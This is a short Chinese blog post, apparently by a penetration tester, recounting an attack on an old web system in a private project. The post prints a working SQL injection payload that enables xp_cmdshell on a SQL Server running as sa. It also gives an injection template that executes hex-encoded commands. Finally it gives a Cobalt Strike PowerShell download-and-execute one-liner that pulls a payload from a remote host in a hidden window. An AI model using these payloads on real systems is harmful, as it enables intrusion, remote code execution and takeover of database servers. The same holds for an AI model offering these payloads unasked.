随手记录一下项目挖洞的情况,因为是私密项目,脱敏之后,权当是公众号水文章了,也是顺带记录一下自己挖洞的历程,希望一天比一天进步,发过的文章就是最好的见证成长的记录。
狗头在上
,
打码为敬
一看这个界面
,
就知道是老系统
,
肯定存在很多问题
,
随手一试
,
发现万能密码直接登录成功
其他端口测试发现数据库为sqlserver
,
且是sa用户
尝试
开启xp扩展
Poc:uname=admin';EXEC master..sp_configure 'SHOW advanced options',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'xp_cmdshell',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'SHOW advanced options',0; RECONFIGURE WITH OVERRIDE---- &upwd=123123&EngState=1&ident=
发现成功
,
准备
上线cs服务器
Poc:uname=admin';DECLARE @er VARCHAR(8000);SET @er=(需要hex编码一下);EXEC master..xp_cmdshell @er-- &upwd=123123&EngState=1&ident=
此处不知道哪里有问题,网上在线的编码一直有问题,推荐使用小葵编码工具
此处就是我们需要的值 上线成功 执行命令成功 记录一下cs的操作步骤 1. 设置监听 2. 一顿设置监听的方式还有内容 3. 看图 4. 生成命令结果powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.10:2112/a'))"
这里用的是powershell上线
,
因为是Windows的
5.
静待上线